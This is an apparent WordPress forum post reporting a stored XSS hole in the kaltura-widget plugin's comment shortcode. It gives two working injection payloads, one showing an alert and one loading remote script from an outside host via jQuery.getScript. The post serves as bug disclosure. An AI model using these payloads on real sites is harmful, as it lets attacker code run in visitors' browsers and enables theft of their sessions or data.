kaltura-widget xss security error
-
I was playing with my friend wordpress site looking for security vulnerabilities (little hobby of mine). And I found that I can run any javascript code on his site by submitting a comment.
showing an alert:
[kaltura-widget wid='"); alert("ok"); $("xxx' size="comments" /]
running code from other server:
[kaltura-widget wid='"); jQuery.getScript("https://somedomain.com/xss.js"); $("xxx' size="comments" /]
I guess that it is a bug that should be fixed.
Viewing 8 replies - 1 through 8 (of 8 total)
Viewing 8 replies - 1 through 8 (of 8 total)
- The topic ‘kaltura-widget xss security error’ is closed to new replies.